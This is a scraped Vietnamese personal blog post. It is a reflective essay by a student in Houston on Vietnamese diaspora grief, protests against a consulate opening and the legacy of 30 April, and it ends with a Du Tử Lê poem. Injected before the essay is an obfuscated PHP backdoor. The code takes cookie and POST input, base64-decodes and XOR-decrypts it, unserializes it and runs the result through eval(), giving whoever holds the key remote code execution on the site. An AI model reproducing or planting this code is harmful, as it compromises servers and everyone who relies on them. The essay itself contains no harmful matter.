$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Mẹ ơi, 34 năm rồi, sao nước mắt vẫn chưa thôi rơi? – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Mẹ ơi, 34 năm rồi, sao nước mắt vẫn chưa thôi rơi?

Quốc kỳ Việt Nam Quốc kỳ Việt Nam Cộng Hoà

Những ngày gần đây, khi đi trên xe, nghe đài radio của người Việt bên này, tôi thấy có hai tin tức đáng chú ý sau:

– Thứ nhất là tin cô Annie Le, nữ sinh gốc Việt, sắp tới ngày làm đám cưới thì bị hãm hại. Tin này báo Việt Nam cũng có đăng, nhưng chắc mức độ quan tâm không được như bên đây. Người Việt chúng tôi xa xứ vì nhiều lí do khác nhau, hằng ngày đắm mình vào cái xã hội và văn hoá Mỹ, xung quanh nghe toàn thứ tiếng xì xồ xa lạ, đôi lúc dường như là phản xạ, cứ đảo mắt kiếm tìm, gióng tai lên lắng nghe một bóng hình, một giọng nói phát âm cái ngôn ngữ quen thuộc của dân tộc mình. Vì thế, bất cứ gì có liên quan đến người Việt Nam đều được cộng đồng rất quan tâm.
Cộng đồng người Việt ở nơi không phải Tổ quốc của mình, là một cộng đồng thực thụ, không phải như hàng tá cộng đồng được dựng lên tượng trưng. Ở đây, người ta sẵn sàng giúp đỡ nhau hết mình, chỉ cần nghe loáng thoáng hay nhìn người kia có vẻ là người Việt Nam. Âu cũng là điều rất đáng quý.
– Thứ hai là tin kêu gọi biểu tình chống việc “cộng sản Việt Nam mở toà Đại Sứ Quán ở Houston” (tôi nhắc lại nguyên văn) vào tuần tới. Đại sứ quán ở đây là ông Lê Dũng – cựu phát ngôn bộ ngoại giao Việt Nam. Nghe đâu ngày khánh thành sẽ có cả các quan chức cao cấp của Việt Nam sang tham dự, có cả thủ tướng Nguyễn Tấn Dũng. Vì thế, những người “tị nạn Cộng Sản” bên đây bỏ công tìm kiếm địa điểm này, và tổ chức biểu dương lực lượng, biểu tình phản đối.

Trước đây, khi còn bên Việt Nam, tôi có cái nhìn không thiện cảm lắm với những người đi khỏi Tổ quốc rồi vẫn quay về chống đối chế độ. Đây không hoàn toàn là do bộ máy tuyên truyền của nhà nước, do tư tưởng Hồ Chí Minh và lịch sử Đảng đã thấm nhuần trong tôi (dù tôi thi hai môn này được lần lượt 7 và 8 điểm), bởi cách vượt proxy để vào talawas hay x-cà là quá đơn giản với một thằng sinh viên Công nghệ thông tin như tôi. Qua bên này, tôi vẫn không ủng hộ việc họ chống đối lại chế độ, nhưng có cái nhìn cảm thông hơn.

Houston nơi tôi đang sống có khá đông người Việt, chắc là chỉ sau quận Cam (Orange County) ở California. Tôi có dịp nói chuyện với khá nhiều người Việt ở đây, và cảm thấy thương cho họ. Không ai muốn rời bỏ Tổ Quốc để ra đi vượt biên, trôi giạt giữa biển trên những con tàu ọp ẹp hàng tuần liền, chịu đựng mọi cực khổ, đánh cuộc với chính mạng sống của mình. Nhưng rất nhiều người đã chọn con đường ra đi, không phải do vấn đề chính trị, mà theo vài người là do cái mong muốn cơ bản nhất của con người là được sống an bình đã bị tước mất.

Ở bên này, người ta gọi ngày 30/4 là ngày mất nước, và từ đó đúng đến từng âm tiết, từng chữ cái với trường hợp của họ. Đang nhà cao cửa rộng, cuộc sống an lành, lại phải bỏ hết cả gia tài, di tản về miền quê cầm cuốc cầm cày, lo từng bữa ăn, từng cái áo. Có trường hợp phải trốn mấy năm trời trong rừng, hoặc khi hoà nhập lại thì vẫn bị đánh dấu vì “lí lịch” không tốt. Điều đó gây nên mối hận không nguôi trong lòng họ, dù đã hàng chục năm trời trôi qua.

“Khi anh bắn một phát súng lục vào quá khứ, thì tương lai sẽ bắn vào anh bằng một quả đại bác”, tôi không nhớ ông nào đã nói câu này. Nhưng đại loại là mọi thứ đã trôi qua, dù thế nào thì bánh xe lịch sử cũng luôn quay đều. Người ta không thể đặt ra cái giả thiết bắt đầu bằng chữ “Nếu”. Dù thế nào thì Việt Nam Cộng Hoà đã bại trận, nước Việt Nam giờ là một nước thống nhất. Đôi khi tôi đọc bài về Bắc – Nam Triều Tiên, hay tình trạng tị nạnh giữa Đông – Tây Đức sau khi bức tường Berlin sụp đổ, lại cảm thấy may mắn vì nước nhà thống nhất, dù rằng về “mức sống người dân” ở Thành phố Hồ Chí Minh không so được với Sài Gòn Hòn ngọc Viễn Đông ngày ấy.

Ba tôi thường dạy tôi, có hai điều không bao giờ nên bàn luận, đó là “chính trị” và “tôn giáo”. Đơn giản đó là vấn đề về tư tưởng và niềm tin. Tôi không thể thuyết phục những người đang sống ở hải ngoại rằng “nước mình” giờ sống tốt, tuy còn nhiều điều cần phải sửa. Tôi không thể nói với họ rằng, hành động gây áp lực để một số trường Đại học lớn ở bang Texas không được treo cờ đỏ sao vàng, là hành động quá khích. Bởi mối hận thù của họ đơn giản là quá lớn, nó được nung nấu bằng những sự mất mát lớn lao, những giọt nước mắt đau khổ (và cả những giọt máu), nỗi đau và nỗi nhớ khôn nguôi trong suốt hàng năm trời.

Không có gì là đúng hay sai. Chân lý thuộc về kẻ chiến thắng, như bọn Tây hay nói “The winner takes it all…”. Cả hai bên đều có lí do của mình. Chúng ta không thể đổ lỗi cho bất cứ gì, không phải lịch sử, không phải chế độ… mà sự việc đơn thuần là “post hoc ergo propter hoc”, việc này là nguyên nhân gây ra việc kia, cả một chuỗi sự việc – tất nhiên – và nối dài theo thời gian. Không thể trách cứ điều gì…

Khi xem Paris By Night, cuốn Ca nhạc theo yêu cầu, tới phần Quỳnh Anh hát “Hello ViệtNam”, dưới khán phòng có nhiều người khóc. Dù có ra đi vì lí do nào đi nữa, thì Việt Nam vẫn luôn là quê cha, đất tổ, và không có nỗi đau gì lớn hơn khi phải dứt áo bỏ quê hương ra đi.

Mong rằng, đó chỉ là hận thù của đời họ, và sẽ chấm dứt sau khi họ nhắm mắt lìa đời, đừng truyền cái tư tưởng này sang thế hệ sau… Đừng để “thế hệ thứ hai” bên này phải thốt lên câu “mẹ ơi, bao nhiêu năm rồi, sao nước mắt vẫn chưa thôi rơi?”

Khi tôi chết hãy đem tôi ra biển
nước ngược dòng sẽ đẩy xác trôi đi
bên kia biển là quê hương tôi đó
rặng tre xưa muôn tuổi vẫn xanh rì

Khi tôi chết hãy đem tôi ra biển
và nhớ đừng vội vuốt mắt cho tôi
cho tôi hướng vọng quê tôi lần cuối
biết đâu chừng xác tôi chẳng đến nơi…

Du Tử Lê

160909,
B.l.u.e
.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.